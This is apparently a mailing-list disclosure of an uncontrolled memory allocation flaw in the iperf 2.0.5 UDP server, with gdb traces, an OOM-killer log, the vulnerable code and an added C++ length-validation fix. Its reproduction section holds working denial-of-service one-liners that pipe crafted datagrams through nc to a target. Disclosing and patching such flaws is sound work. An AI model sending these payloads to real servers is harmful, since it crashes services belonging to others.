CWE-789 (http://cwe.mitre.org/data/definitions/789.html): Uncontrolled Memory Allocation in iperf 2.0.5 UDP Server Mode
$ gdb src/iperf
GNU gdb (Ubuntu 7.7.1-0ubuntu5~14.04.2) 7.7.1
Copyright (C) 2014 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from src/iperf...(no debugging symbols found)...done.
(gdb) run -s -u
Starting program: iperf-2.0.5/src/iperf -s -u
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
[New Thread 0x7ffff6fd5700 (LWP 13968)]
[New Thread 0x7ffff67d4700 (LWP 13969)]
------------------------------------------------------------
Server listening on UDP port 5001
Receiving 1470 byte datagrams
UDP buffer size:  208 KByte (default)
------------------------------------------------------------
[New Thread 0x7ffff5fd3700 (LWP 13970)]
[  3] local 10.0.0.26 port 5001 connected with 10.0.0.183 port 5001
[ ID] Interval       Transfer     Bandwidth        Jitter   Lost/Total Datagrams
[  3]  0.0- 1.0 sec  67.0 Bytes   536 bits/sec   0.000 ms 5592405/5592406 (1e+02%)
[New Thread 0x7ffff57d2700 (LWP 13971)]
terminate called after throwing an instance of 'std::bad_alloc'
  what():  std::bad_alloc
[Thread 0x7ffff5fd3700 (LWP 13970) exited]

Program received signal SIGABRT, Aborted.
[Switching to Thread 0x7ffff57d2700 (LWP 13971)]
0x00007ffff7312bb9 in __GI_raise (sig=sig@entry=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:56
56	../nptl/sysdeps/unix/sysv/linux/raise.c: No such file or directory.
(gdb) bt
#0  0x00007ffff7312bb9 in __GI_raise (sig=sig@entry=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:56
#1  0x00007ffff7315fc8 in __GI_abort () at abort.c:89
#2  0x00007ffff7b366b5 in __gnu_cxx::__verbose_terminate_handler() () from /usr/lib/x86_64-linux-gnu/libstdc++.so.6
#3  0x00007ffff7b34836 in ?? () from /usr/lib/x86_64-linux-gnu/libstdc++.so.6
#4  0x00007ffff7b34863 in std::terminate() () from /usr/lib/x86_64-linux-gnu/libstdc++.so.6
#5  0x00007ffff7b34aa2 in __cxa_throw () from /usr/lib/x86_64-linux-gnu/libstdc++.so.6
#6  0x00007ffff7b34f8d in operator new(unsigned long) () from /usr/lib/x86_64-linux-gnu/libstdc++.so.6
#7  0x00007ffff7b35029 in operator new[](unsigned long) () from /usr/lib/x86_64-linux-gnu/libstdc++.so.6
#8  0x0000000000402716 in Client::Client(thread_Settings*) ()
#9  0x0000000000403191 in client_spawn ()
#10 0x000000000040a98d in thread_run_wrapper ()
#11 0x00007ffff76aa182 in start_thread (arg=0x7ffff57d2700) at pthread_create.c:312
#12 0x00007ffff73d6fbd in clone () at ../sysdeps/unix/sysv/linux/x86_64/clone.S:111
(gdb) quit
A debugging session is active.

	Inferior 1 [process 13964] will be killed.

Quit anyway? (y or n) y
martem@bluelabel:~/iperf/iperf-2.0.5$

Offending code, Client.cpp line 74:

 * Store server hostname, optionally local hostname, and socket info.
 * ------------------------------------------------------------------- */

Client::Client( thread_Settings *inSettings ) {
    mSettings = inSettings;
    mBuf = NULL;

    // initialize buffer
    mBuf = new char[ mSettings->mBufLen ];
    ...

Somehow mSettings->mBufLen is taken directly from the network.
Easier way is to get a std::bad_alloc crash:

[New Thread 0x7ffff5fd3700 (LWP 13970)]
[  3] local 10.0.0.26 port 5001 connected with 10.0.0.183 port 5001
[ ID] Interval       Transfer     Bandwidth        Jitter   Lost/Total Datagrams
[  3]  0.0- 1.0 sec  67.0 Bytes   536 bits/sec   0.000 ms 5592405/5592406 (1e+02%)
[New Thread 0x7ffff57d2700 (LWP 13971)]
terminate called after throwing an instance of 'std::bad_alloc'
  what():  std::bad_alloc
[Thread 0x7ffff5fd3700 (LWP 13970) exited]

Program received signal SIGABRT, Aborted.
[Switching to Thread 0x7ffff57d2700 (LWP 13971)]
0x00007ffff7312bb9 in __GI_raise (sig=sig@entry=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:56
56	../nptl/sysdeps/unix/sysv/linux/raise.c: No such file or directory.
(gdb) bt

If there is enough memory:

------------------------------------------------------------
Client connecting to 10.0.0.183, UDP port 43690
Sending 65535 byte datagrams
UDP buffer size:  208 KByte (default)
------------------------------------------------------------
[  3] local 10.0.0.26 port 42190 connected with 10.0.0.183 port 43690
^C
Program received signal SIGINT, Interrupt.
pthread_cond_wait@@GLIBC_2.3.2 () at ../nptl/sysdeps/unix/sysv/linux/x86_64/pthread_cond_wait.S:185
185	../nptl/sysdeps/unix/sysv/linux/x86_64/pthread_cond_wait.S: No such file or directory.
(gdb) bt

And if there isn't enough:

[Thread 0x7ffff67d4700 (LWP 14067) exited]
[Thread 0x7ffff6fd5700 (LWP 14066) exited]

Program terminated with signal SIGKILL, Killed.
The program no longer exists.
(gdb) bt
No stack.
syslog:

Nov 28 15:14:21 bluelabel kernel: [84274.801764] iperf invoked oom-killer: gfp_mask=0x280da, order=0, oom_score_adj=0
Nov 28 15:14:21 bluelabel kernel: [84274.801772] iperf cpuset=/ mems_allowed=0
Nov 28 15:14:21 bluelabel kernel: [84274.801777] CPU: 0 PID: 14261 Comm: iperf Tainted: G OX 3.13.0-40-generic #69-Ubuntu
Nov 28 15:14:21 bluelabel kernel: [84274.801780] Hardware name: innotek GmbH VirtualBox/VirtualBox, BIOS VirtualBox 12/01/2006
Nov 28 15:14:21 bluelabel kernel: [84274.801783]  0000000000000000 ffff8800361fda80 ffffffff8171f226 ffff880036140000
Nov 28 15:14:21 bluelabel kernel: [84274.801788]  ffff8800361fdb08 ffffffff81719ae1 0000000000000000 0000000000000000
Nov 28 15:14:21 bluelabel kernel: [84274.801791]  0000000000000000 0000000000000000 0000000000000000 0000000000000000
Nov 28 15:14:21 bluelabel kernel: [84274.801794] Call Trace:
Nov 28 15:14:21 bluelabel kernel: [84274.801804]  [<ffffffff8171f226>] dump_stack+0x45/0x56
Nov 28 15:14:21 bluelabel kernel: [84274.801810]  [<ffffffff81719ae1>] dump_header+0x7f/0x1f1
Nov 28 15:14:21 bluelabel kernel: [84274.801816]  [<ffffffff8115255e>] oom_kill_process+0x1ce/0x330
Nov 28 15:14:21 bluelabel kernel: [84274.801822]  [<ffffffff812d5715>] ? security_capable_noaudit+0x15/0x20
Nov 28 15:14:21 bluelabel kernel: [84274.801827]  [<ffffffff81152c94>] out_of_memory+0x414/0x450
Nov 28 15:14:21 bluelabel kernel: [84274.801832]  [<ffffffff81158ffb>] __alloc_pages_nodemask+0xa5b/0xb80
Nov 28 15:14:21 bluelabel kernel: [84274.801837]  [<ffffffff811997ba>] alloc_pages_vma+0x9a/0x140
Nov 28 15:14:21 bluelabel kernel: [84274.801843]  [<ffffffff8117a103>] handle_mm_fault+0xb23/0xf00
Nov 28 15:14:21 bluelabel kernel: [84274.801848]  [<ffffffff8172b2a4>] __do_page_fault+0x184/0x560
Nov 28 15:14:21 bluelabel kernel: [84274.801853]  [<ffffffff81182215>] ? change_protection+0x65/0xb0
Nov 28 15:14:21 bluelabel kernel: [84274.801857]  [<ffffffff811823b1>] ? mprotect_fixup+0x151/0x290
Nov 28 15:14:21 bluelabel kernel: [84274.801862]  [<ffffffff8172b69a>] do_page_fault+0x1a/0x70
Nov 28 15:14:21 bluelabel kernel: [84274.801866]  [<ffffffff81727b08>] page_fault+0x28/0x30
Nov 28 15:14:21 bluelabel kernel: [84274.801868] Mem-Info:
Nov 28 15:14:21 bluelabel kernel: [84274.801871] Node 0 DMA per-cpu:
Nov 28 15:14:21 bluelabel kernel: [84274.801879] CPU    0: hi:    0, btch:   1 usd:   0
Nov 28 15:14:21 bluelabel kernel: [84274.801882] CPU    1: hi:    0, btch:   1 usd:   0
Nov 28 15:14:21 bluelabel kernel: [84274.801884] CPU    2: hi:    0, btch:   1 usd:   0
Nov 28 15:14:21 bluelabel kernel: [84274.801886] CPU    3: hi:    0, btch:   1 usd:   0
Nov 28 15:14:21 bluelabel kernel: [84274.801889] Node 0 DMA32 per-cpu:
Nov 28 15:14:21 bluelabel kernel: [84274.801891] CPU    0: hi:  186, btch:  31 usd:  57
Nov 28 15:14:21 bluelabel kernel: [84274.801894] CPU    1: hi:  186,

On FreeBSD you would get a blunt message "out of swap" or something.

Reproducing the problems:

# oom killer on kubuntu
echo -e -n "\x2a\x8e\x10\x4f\x7d\x0e\xe3\x57\xc9\x93\x1b\x91\xac\x1d\xed\x3d\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f" | nc target-ip 5001 -u -q 1

# bad alloc
echo -e -n "\x00\x00\x00\x01\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\x7f\xff\xff\xff\xaa\xaa\xaa\xae\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa" | nc target-ip 5001 -p 5001 -u -q 1
echo -e -n "\x80\x00\x00\x01\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\x7f\xff\xff\xff\xaa\xaa\xaa\xae\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa" | nc target-ip 5001 -p 5001 -u -q 1

7fffffff is the allocation size.

-- 
Aivar Liimets

-- 
Ubuntu-motu mailing list
Modify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-motu
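As a defensive counterpart to the Client.cpp excerpt in the report (example code written for this page, not iperf's own code and not part of the original message), the following C++ parses the first UDP datagram the way a server would have to and bounds the peer-supplied buffer length before anything is handed to new char[]. The header layout it assumes (a 12-byte UDP_datagram followed by six big-endian int32 fields, flags first and bufferlen fourth, which puts bufferlen at byte offset 24, where the reproduction commands above place 0x7fffffff), the HEADER_VERSION1 bit 0x80000000, the 1470-byte default and the 65535-byte ceiling are all assumptions of this example; every function and constant name in it is mine.

```cpp
// Added example, not iperf code: validate the peer-advertised buffer length
// from the first UDP datagram before allocating the per-client buffer.
#include <cstddef>
#include <cstdint>
#include <cstdio>
#include <memory>
#include <vector>

namespace {

// Assumed wire layout (after iperf 2.0.5's Settings.hpp as I read it):
// UDP_datagram { int32 id; uint32 tv_sec; uint32 tv_usec; }          -> 12 bytes
// client_hdr   { int32 flags, numThreads, mPort, bufferlen, mWinBand, mAmount; } -> 24 bytes
constexpr size_t   kUdpDatagramSize = 12;
constexpr size_t   kClientHdrSize   = 24;
constexpr uint32_t kHeaderVersion1  = 0x80000000u;  // assumed HEADER_VERSION1 flag bit

// Policy knobs (assumptions): 1470 is the default UDP datagram size shown in
// the server banner; 65535 is the largest payload a single UDP datagram can
// carry, so nothing larger can ever be a legitimate request.
constexpr uint32_t kDefaultUdpBufLen = 1470;
constexpr uint32_t kMaxBufLen        = 65535;

uint32_t be32(const uint8_t* p) {
    return (uint32_t(p[0]) << 24) | (uint32_t(p[1]) << 16) |
           (uint32_t(p[2]) << 8)  |  uint32_t(p[3]);
}

}  // namespace

struct ClientHeader {
    uint32_t flags;
    uint32_t numThreads;
    uint32_t port;
    uint32_t bufferlen;   // exactly as the peer sent it: still untrusted
    uint32_t winBand;
    uint32_t amount;
};

// Fills hdr and returns true only if the datagram is long enough and carries
// a version-1 client header; otherwise the datagram spawns no client.
bool parseClientHeader(const uint8_t* data, size_t len, ClientHeader& hdr) {
    if (len < kUdpDatagramSize + kClientHdrSize) return false;
    const uint8_t* p = data + kUdpDatagramSize;
    hdr.flags      = be32(p + 0);
    hdr.numThreads = be32(p + 4);
    hdr.port       = be32(p + 8);
    hdr.bufferlen  = be32(p + 12);
    hdr.winBand    = be32(p + 16);
    hdr.amount     = be32(p + 20);
    return (hdr.flags & kHeaderVersion1) != 0;
}

// The check the excerpt lacks. Returns the length to allocate, or 0 to mean
// "reject this peer". The value stays unsigned throughout, so a request with
// the top bit set is simply out of range rather than a negative length.
uint32_t sanitizeBufLen(uint32_t requested) {
    if (requested == 0) return kDefaultUdpBufLen;  // treat 0 as "use the default"
    if (requested > kMaxBufLen) return 0;
    return requested;
}

// Allocates the client buffer only after validation. Returns nullptr (and
// chosenLen == 0) when the datagram must be dropped; the caller should log it.
std::unique_ptr<char[]> allocateClientBuffer(const uint8_t* datagram, size_t len,
                                             uint32_t& chosenLen) {
    ClientHeader hdr{};
    chosenLen = 0;
    if (!parseClientHeader(datagram, len, hdr)) return nullptr;
    chosenLen = sanitizeBufLen(hdr.bufferlen);
    if (chosenLen == 0) {
        std::fprintf(stderr, "rejecting client header: bufferlen 0x%08lx exceeds %lu bytes\n",
                     static_cast<unsigned long>(hdr.bufferlen),
                     static_cast<unsigned long>(kMaxBufLen));
        return nullptr;
    }
    return std::unique_ptr<char[]>(new char[chosenLen]);
}

// Constructed test datagram: UDP_datagram plus client_hdr, filler bytes 0xaa.
std::vector<uint8_t> makeDatagram(uint32_t flags, uint32_t bufferlen) {
    std::vector<uint8_t> d(kUdpDatagramSize + kClientHdrSize, 0xaa);
    auto put = [&d](size_t off, uint32_t v) {
        d[off]     = static_cast<uint8_t>(v >> 24);
        d[off + 1] = static_cast<uint8_t>(v >> 16);
        d[off + 2] = static_cast<uint8_t>(v >> 8);
        d[off + 3] = static_cast<uint8_t>(v);
    };
    put(0, 1);           // datagram id
    put(12, flags);      // client_hdr.flags
    put(24, bufferlen);  // client_hdr.bufferlen
    return d;
}

int main() {
    uint32_t len = 0;
    auto normal = makeDatagram(kHeaderVersion1, 1470);
    auto buf = allocateClientBuffer(normal.data(), normal.size(), len);
    std::printf("1470-byte request: %s (%lu bytes)\n", buf ? "accepted" : "rejected",
                static_cast<unsigned long>(len));

    auto huge = makeDatagram(kHeaderVersion1, 0x7fffffffu);  // the value in the report
    buf = allocateClientBuffer(huge.data(), huge.size(), len);
    std::printf("0x7fffffff request: %s\n", buf ? "accepted" : "rejected");
    return 0;
}
```

Build with `g++ -std=c++11 -Wall example.cpp`. Both bufferlen values used in the reproduction commands (0x7fffffff and 0x6f6f6f6f) are refused before any allocation happens, so neither std::bad_alloc nor the OOM killer comes into play; the choice to reject rather than clamp to the maximum is deliberate, since a peer that asks for more than a datagram can carry is misbehaving and should not get a session at all.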
